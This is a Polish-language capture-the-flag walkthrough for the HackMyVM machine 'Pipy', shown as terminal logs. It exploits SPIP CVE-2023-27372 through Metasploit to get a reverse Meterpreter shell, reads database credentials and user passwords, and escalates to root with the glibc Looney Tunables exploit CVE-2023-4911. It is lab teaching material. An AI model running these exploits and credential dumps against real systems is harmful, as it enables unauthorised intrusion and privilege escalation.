Pipy - ruycr4ft

00. Metainfo

Nazwa: Pipy
Autor: ruycr4ft
Wypuszczony: 2023-10-18
Ściągnij: HackMyVM
Poziom: Łatwy
System: Linux
Nauczysz się: Podatności CVE

01. Wstęp

Pipy jest dosyć ciekawą maszynką, w której łamanie zbliżone jest do łamania stron w internecie. Jest ona po hiszpańsku, ale nie przeszkadza to zbytnio aby się po niej poruszać. Wcześniej miałem do czynienia z obrazem Za1, w której jest język chiński!!! Powiem wam - masakra. Ale od tego są translatory? Wracając do Pipy - są na niej typowe podatności, spotykane w aplikacjach i do tego w CVE. Do tego są dosyć świeże, sytuacja - listopad 2023 roku.

02. Skanowanie

Skanowanie maszynki pokazało dwa otwarte porty 80 i 22. Czyli jest na razie bardzo typowo.

msf6 > db_nmap 172.16.1.111
[*] Nmap: Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-11-12 00:12 CET
[*] Nmap: Nmap scan report for pipy.lan (172.16.1.111)
[*] Nmap: Host is up (0.0010s latency).
[*] Nmap: Not shown: 998 closed tcp ports (reset)
[*] Nmap: PORT  STATE SERVICE
[*] Nmap: 22/tcp open ssh
[*] Nmap: 80/tcp open http
[*] Nmap: MAC Address: 08:00:27:D4:FF:14 (Oracle VirtualBox virtual NIC)
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 0.27 seconds

03. Spip i CVE-2023-27372

Wchodząc na stronę, tak się ona prezentuje.

Pipy

Szukając na necie możemy poczytać, że SPIP jest systemem zarządzania treścią stworzonym pierwotnie przez minirézo w celu administracji serwisem. Wygląda na to, że jest to większa aplikacja, w stylu Wordpress, a nie tylko sama strona stworzona na potrzeby złamania maszyny. Skanując Feroxbusterem mamy od groma wyników, które szkoda czasu przeglądać.

root@kali2023:~# feroxbuster -u http://172.16.1.111

 ___ ___ __  __   __   __     __  ___
|__ |__ |__) |__) | / `  / \ \_/ | | \ |__
|  |___ | \ | \ | \__,  \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓         ver: 2.10.0
───────────────────────────┬──────────────────────
 🎯 Target Url      │ http://172.16.1.111
 🚀 Threads        │ 50
 📖 Wordlist       │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
 👌 Status Codes     │ All Status Codes!
 💥 Timeout (secs)    │ 7
 🦡 User-Agent      │ feroxbuster/2.10.0
 💉 Config File      │ /etc/feroxbuster/ferox-config.toml
 🔎 Extract Links     │ true
 🏁 HTTP methods     │ [GET]
 🔃 Recursion Depth    │ 4
 🎉 New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
 🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404   GET    9l    31w   274c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
403   GET    9l    28w   277c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
301   GET    9l    28w   310c http://172.16.1.111/tmp => http://172.16.1.111/tmp/
200   GET    1l    2w    14c http://172.16.1.111/tmp/meta_cache.php
301   GET    9l    28w   313c http://172.16.1.111/config => http://172.16.1.111/config/
200   GET    0l    0w    0c http://172.16.1.111/config/ecran_securite.php
301   GET    9l    28w   317c http://172.16.1.111/javascript => http://172.16.1.111/javascript/
200   GET   140l   202w   1497c http://172.16.1.111/squelettes-dist/css/reset.css
200   GET   107l   232w   2093c http://172.16.1.111/squelettes-dist/css/links.css
200   GET   844l  12099w  102564c http://172.16.1.111/tmp/log/spip.log.1
200   GET    1l    30w   191c http://172.16.1.111/tmp/log/auth.log
301   GET    9l    28w   312c http://172.16.1.111/local => http://172.16.1.111/local/
200   GET    4l    23w   187c http://172.16.1.111/local/CACHEDIR.TAG
200   GET    3l    13w    83c http://172.16.1.111/local/remove.txt
200   GET   705l   1688w  22638c http://172.16.1.111/local/cache-js/jsdyn-javascript_porte_plume_start_js-32d0edfd.js.last
200   GET   705l   1688w  22638c http://172.16.1.111/local/cache-js/jsdyn-javascript_porte_plume_start_js-13fb4c3e.js
200   GET   705l   1688w  22638c http://172.16.1.111/local/cache-js/jsdyn-javascript_porte_plume_start_js-511d27b4.js
200   GET    48l   125w   1145c http://172.16.1.111/local/cache-js/jsdyn-javascript_bigup_trads_js-d96dfd1d.js.last
200   GET    3l    9w   289c http://172.16.1.111/local/cache-gd2/ac/ee1c4100e66342a18beacada39d3f5.png
301   GET    9l    28w   313c http://172.16.1.111/ecrire => http://172.16.1.111/ecrire/
301   GET    9l    28w   312c http://172.16.1.111/prive => http://172.16.1.111/prive/
200   GET    15l    46w   439c http://172.16.1.111/prive/spip_style_print.css
200   GET   371l   1466w  13268c http://172.16.1.111/prive/spip_admin.css
200   GET   124l   305w   3861c http://172.16.1.111/prive/javascript/gadgets.js
301   GET    9l    28w   322c http://172.16.1.111/squelettes-dist => http://172.16.1.111/squelettes-dist/
200   GET  10993l  45090w  293671c http://172.16.1.111/prive/javascript/jquery.js
200   GET    36l    67w   1504c http://172.16.1.111/squelettes-dist/backend.html
200   GET    24l    38w   739c http://172.16.1.111/squelettes-dist/calendrier.html
200   GET    26l    45w   1422c http://172.16.1.111/squelettes-dist/rss_forum_article.html
200   GET   3783l  11745w  123519c http://172.16.1.111/prive/javascript/Sortable.js
200   GET    26l    45w   1385c http://172.16.1.111/squelettes-dist/rss_forum_breve.html
200   GET    26l    45w   1397c http://172.16.1.111/squelettes-dist/rss_forum_rubrique.html
301   GET    9l    28w   313c http://172.16.1.111/vendor => http://172.16.1.111/vendor/
200   GET    0l    0w    0c http://172.16.1.111/vendor/autoload.php
200   GET    20l   101w   1221c http://172.16.1.111/vendor/jakeasmith/http_build_url/readme.md
...

Więc pójdźmy inną w stronę - podatność na aplikację. Sprawdźmy w Metasploicie czy jest jakaś podatność na Spip?

msf6 > search spip

Matching Modules
================

  # Name                  Disclosure Date Rank    Check Description
  - ----                  --------------- ----    ----- -----------
  0 exploit/unix/webapp/spip_connect_exec 2012-07-04    excellent Yes  SPIP connect Parameter PHP Injection
  1 exploit/unix/webapp/spip_rce_form   2023-02-27    excellent Yes  SPIP form PHP Injection


Interact with a module by name or index. For example info 1, use 1 or use exploit/unix/webapp/spip_rce_form

msf6 > use 1
[*] Using configured payload php/meterpreter/reverse_tcp
msf6 exploit(unix/webapp/spip_rce_form) > show options 

Module options (exploit/unix/webapp/spip_rce_form):

  Name    Current Setting Required Description
  ----    --------------- -------- -----------
  Proxies           no    A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS           yes    The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit
                     .html
  RPORT   80        yes    The target port (TCP)
  SSL    false      no    Negotiate SSL/TLS for outgoing connections
  SSLCert           no    Path to a custom SSL certificate (default is randomly generated)
  TARGETURI /        yes    The base path to SPIP application
  URIPATH           no    The URI to use for this exploit (default is random)
  VHOST            no    HTTP server virtual host


  When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:

  Name   Current Setting Required Description
  ----   --------------- -------- -----------
  SRVHOST 0.0.0.0     yes    The local host or network interface to listen on. This must be an address on the local machine or 0
                    .0.0.0 to listen on all addresses.
  SRVPORT 8080       yes    The local port to listen on.


Payload options (php/meterpreter/reverse_tcp):

  Name  Current Setting Required Description
  ----  --------------- -------- -----------
  LHOST          yes    The listen address (an interface may be specified)
  LPORT 4444       yes    The listen port


Exploit target:

  Id Name
  -- ----
  0  Automatic (PHP In-Memory)View the full module info with the info, or info -d command.

msf6 exploit(unix/webapp/spip_rce_form) > set lhost eth0
lhost => 172.16.1.89
msf6 exploit(unix/webapp/spip_rce_form) > set RHOSTS 172.16.1.111
RHOSTS => 172.16.1.111
msf6 exploit(unix/webapp/spip_rce_form) > run -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 172.16.1.89:4444 
msf6 exploit(unix/webapp/spip_rce_form) > [*] Running automatic check ("set AutoCheck false" to disable)
[*] SPIP Version detected: 4.2.0
[+] The target appears to be vulnerable.
[*] Got anti-csrf token: iYe2q77AjJpzr7DiCN466DffCNPeUp0xMFqKM8HZ2jA5IWNjp6Vhzoioj1CV4d/wM8wzPYKIJAYCiLEY+fBNfgPHcNshG3+b
[*] 172.16.1.111:80 - Attempting to exploit...
[*] Sending stage (39927 bytes) to 172.16.1.111
[*] Meterpreter session 1 opened (172.16.1.89:4444 -> 172.16.1.111:53128) at 2023-11-12 00:28:35 +0100

msf6 exploit(unix/webapp/spip_rce_form) > 

Jak widać wyżej, jest podatność opisana w CVE-2023-27372, którą wykorzystaliśmy.

04. Mysql

Wchodząc do katalogu /home widzimy użytkownika angela, to się przyda później.

meterpreter > cd /home
meterpreter > ls
Listing: /home
==============

Mode       Size Type Last modified       Name
----       ---- ---- -------------       ----
040750/rwxr-x--- 4096 dir  2023-11-11 01:18:43 +0100 angela

Po krótkiej analizie widać, że jest i serwer Mysql, na który spróbujemy wejść. Będąc w katalogu /var/www/html/config mamy takie coś:

meterpreter > pwd
/var/www/html/config
meterpreter > cat connect.php
<?php
if (!defined("_ECRIRE_INC_VERSION")) return;
defined('_MYSQL_SET_SQL_MODE') || define('_MYSQL_SET_SQL_MODE',true);
$GLOBALS['spip_connect_version'] = 0.8;
spip_connect_db('localhost','','root','dbpassword','spip','mysql', 'spip','','');

Jest login i hasło, dzięki któremu wejdziemy na Mysql

meterpreter > shell
Process 2630 created.
Channel 3 created.
python
/bin/sh: 1: python: not found
python3 -c 'import pty; pty.spawn("bash");'
www-data@pipy:/var/www/html/config$ 

www-data@pipy:/var/www/html/config$ mysql -uroot -p
mysql -uroot -p
Enter password: dbpassword

Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 46
Server version: 10.6.12-MariaDB-0ubuntu0.22.04.1 Ubuntu 22.04

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> 
MariaDB [(none)]> show databases;
show databases;
+--------------------+
| Database      |
+--------------------+
| information_schema |
| mysql       |
| performance_schema |
| spip        |
| sys        |
+--------------------+
5 rows in set (0.000 sec)

MariaDB [(none)]> use spip;
use spip;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MariaDB [spip]> show tables;
show tables;
+-------------------------+
| Tables_in_spip     |
+-------------------------+
| spip_articles      |
| spip_auteurs      |
| spip_auteurs_liens   |
| spip_depots       |
| spip_depots_plugins   |
| spip_documents     |
| spip_documents_liens  |
| spip_forum       |
| spip_groupes_mots    |
| spip_jobs        |
| spip_jobs_liens     |
| spip_meta        |
| spip_mots        |
| spip_mots_liens     |
| spip_paquets      |
| spip_plugins      |
| spip_referers      |
| spip_referers_articles |
| spip_resultats     |
| spip_rubriques     |
| spip_syndic       |
| spip_syndic_articles  |
| spip_types_documents  |
| spip_urls        |
| spip_versions      |
| spip_versions_fragments |
| spip_visites      |
| spip_visites_articles  |
+-------------------------+
28 rows in set (0.000 sec)

MariaDB [spip]> desc spip_auteurs;    
desc spip_auteurs;
+--------------+--------------+------+-----+---------------------+-------------------------------+
| Field    | Type     | Null | Key | Default       | Extra             |
+--------------+--------------+------+-----+---------------------+-------------------------------+
| id_auteur  | bigint(21)  | NO  | PRI | NULL        | auto_increment        |
| nom     | text     | NO  |   | ''         |                |
| bio     | text     | NO  |   | ''         |                |
| email    | tinytext   | NO  |   | ''         |                |
| nom_site   | tinytext   | NO  |   | ''         |                |
| url_site   | text     | NO  |   | ''         |                |
| login    | varchar(255) | YES | MUL | NULL        |                |
| pass     | tinytext   | NO  |   | ''         |                |
| low_sec   | tinytext   | NO  |   | ''         |                |
| statut    | varchar(255) | NO  | MUL | 0          |                |
| webmestre  | varchar(3)  | NO  |   | non         |                |
| maj     | timestamp  | NO  |   | current_timestamp() | on update current_timestamp() |
| pgp     | text     | NO  |   | ''         |                |
| htpass    | tinytext   | NO  |   | ''         |                |
| en_ligne   | datetime   | NO  | MUL | 0000-00-00 00:00:00 |                |
| alea_actuel | tinytext   | YES |   | NULL        |                |
| alea_futur  | tinytext   | YES |   | NULL        |                |
| prefs    | text     | YES |   | NULL        |                |
| cookie_oubli | tinytext   | YES |   | NULL        |                |
| source    | varchar(10) | NO  |   | spip        |                |
| lang     | varchar(10) | NO  |   |           |                |
| imessage   | varchar(3)  | NO  |   |           |                |
| backup_cles | mediumtext  | NO  |   | ''         |                |
+--------------+--------------+------+-----+---------------------+-------------------------------+
23 rows in set (0.001 sec)

MariaDB [spip]> select id_auteur, pass, htpass from spip_auteurs;
select id_auteur, pass, htpass from spip_auteurs;
+-----------+--------------------------------------------------------------+--------+
| id_auteur | pass                             | htpass |
+-----------+--------------------------------------------------------------+--------+
|     1 | 4ng3l4                            |    |
|     2 | $2y$10$.GR/i2bwnVInUmzdzSi10u66AKUUWGGDBNnA7IuIeZBZVtFMqTsZ2 |    |
+-----------+--------------------------------------------------------------+--------+
2 rows in set (0.000 sec)

Wszystko co powyżej widać, jest tak intuicyjne, że nawet nie musiałem szukać informacji w necie. Nawet patrząc na id_auteur, zgadłem, że jest to użytkownik. Mamy hasło użytkownika angela.

05. Looney Tunables CVE-2023-4911

Ostatnio było głośno o podatności CVE-2023-4911, którą wykorzystamy. Ale najpierw sprawdźmy, czy jest na to podatność.

env -i "GLIBC_TUNABLES=glibc.malloc.mxfast=glibc.malloc.mxfast=A" "G=`printf '%08192x' 1`" /usr/bin/su --help
Segmentation fault (core dumped)

Jest Segmentation fault (core dumped), więc możemy spróbować eksploita, który jest tutaj.

unzip main.zip
Archive: main.zip
acf0d3a8bd4c437475a7c4c83f5790e53e8103cb
  creating: CVE-2023-4911-main/
 inflating: CVE-2023-4911-main/Makefile 
 inflating: CVE-2023-4911-main/README.md 
 inflating: CVE-2023-4911-main/exp.c 
 inflating: CVE-2023-4911-main/gen_libc.py 
angela@pipy:/tmp$ cd CVE-2023-4911-main/
angela@pipy:/tmp/CVE-2023-4911-main$ make
gcc -o exp exp.c
python3 gen_libc.py
[*] Checking for new versions of pwntools
  To disable this functionality, set the contents of /home/angela/.cache/.pwntools-cache-3.10/update to 'never' (old way).
  Or add the following lines to ~/.pwn.conf or ~/.config/pwn.conf (or /etc/pwn.conf system-wide):
    [update]
    interval=never
[*] You have the latest version of Pwntools (4.11.0)
[*] '/lib/x86_64-linux-gnu/libc.so.6'
  Arch:   amd64-64-little
  RELRO:  Partial RELRO
  Stack:  Canary found
  NX:    NX enabled
  PIE:   PIE enabled
./exp
# id
uid=0(root) gid=0(root) groups=0(root),1000(angela)
# 

Jest i root.

Zostaw komentarz